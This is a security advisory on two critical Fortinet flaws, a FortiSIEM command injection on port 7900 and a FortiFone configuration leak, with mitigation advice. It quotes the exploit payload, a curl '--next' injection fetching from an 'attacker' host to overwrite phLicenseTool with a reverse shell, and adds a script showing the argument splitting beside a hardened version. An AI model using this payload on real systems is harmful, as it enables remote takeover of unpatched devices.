Fortinet patches critical remote code execution and data leak flaws
Take action: Make sure your FortiSIEM and FortiFone devices, or at least the affected ports, are isolated from the internet and reachable only from trusted networks. Then plan an update ASAP. Since a public PoC exploit exists for CVE-2025-64155, this has just become urgent.
Learn More
Fortinet released patches for two critical security flaws in its FortiSIEM and FortiFone products that give unauthenticated attackers access to the affected systems.
Vulnerabilities summary:
- CVE-2025-64155 (CVSS score 9.4) - An OS command injection flaw in FortiSIEM that allows unauthenticated remote code execution via port 7900. The service listening there processes custom API messages without authentication, mapping commands to handlers via integers in phMonitorProcess::initEventHandler. The flaw is reached through handleStorageRequest with the "elastic" storage type: user-controlled XML tags such as cluster_name and cluster_url feed into /opt/phoenix/phscripts/bin/elastic_test_url.sh, and that script's curl invocation via execve allows argument injection. By leveraging curl's obscure --next flag, attackers chain requests: <cluster_url>http://attacker:9200 --next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200</cluster_url>. This overwrites phLicenseTool, which is executed every few seconds, with a reverse shell, yielding admin access. The issue only affects Supervisor and Worker nodes, not Collector nodes.
- CVE-2025-47855 (CVSS score 9.3) - An information exposure flaw in FortiFone that allows unauthenticated attackers to download device configurations. Attackers can send a web request to the web admin interface to download the device configuration file, which often contains sensitive data:
  - Device configuration files
  - Local system settings
  - Network credentials or parameters
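The argument-injection mechanism described for CVE-2025-64155, shown as an added illustration that is not Fortinet's elastic_test_url.sh and does not reproduce the exploit: a hypothetical script that expands a user-controlled cluster_url unquoted into a curl command line, next to a hardened form with quoting, an end-of-options marker and input validation. The payload string is constructed to mirror the one quoted above; curl is never executed, the resulting argv is only rendered so the word-splitting can be inspected.

```shell
#!/bin/sh
# Added example, not code from Fortinet's script. It models the class of bug
# described above: a user-controlled URL expanded unquoted into a curl argv.

# Constructed payload modelled on the one quoted in the advisory write-up.
INJECTED_URL='http://attacker:9200 --next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200'

# Render an argv as "arg1|arg2|..." so the split can be inspected
# without running curl.
join_argv() {
    out=""
    for a in "$@"; do
        out="${out}${out:+|}${a}"
    done
    printf '%s\n' "$out"
}

# Vulnerable pattern (hypothetical): the URL is expanded unquoted, so the
# shell word-splits it and every token becomes its own curl argument.
# "--next", "-o" and the output path are then parsed by curl as options.
vuln_argv() {
    url=$1
    # shellcheck disable=SC2086
    set -- curl -s $url
    join_argv "$@"
}

# Hardened pattern: quote the expansion so the value stays one argument,
# and put "--" before it so even a value starting with "-" cannot become
# an option. curl would then simply fail to resolve the bogus URL.
safe_argv() {
    url=$1
    set -- curl -s -- "$url"
    join_argv "$@"
}

# Input validation on top of quoting: accept only an http(s) URL that
# contains no whitespace at all. Returns 0 when acceptable, 1 otherwise.
valid_cluster_url() {
    case $1 in
        *[[:space:]]*) return 1 ;;
        http://*|https://*) return 0 ;;
        *) return 1 ;;
    esac
}

vuln_argv "$INJECTED_URL"
safe_argv "$INJECTED_URL"
if valid_cluster_url "$INJECTED_URL"; then
    echo "accepted"
else
    echo "rejected"
fi
```

Run with any POSIX sh: the first line of output shows the injected tokens as seven separate curl arguments, the second shows the whole payload kept as a single argument after "--", and the validator rejects it outright. Quoting alone stops the splitting; the "--" and the whitespace check are cheap extra layers for a value that should never be more than a host and port.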
Fortinet advises users to update their software right away. If you cannot update FortiSIEM immediately, you should block access to port 7900.
Horizon3.ai released a proof-of-concept exploit on GitHub for CVE-2025-64155.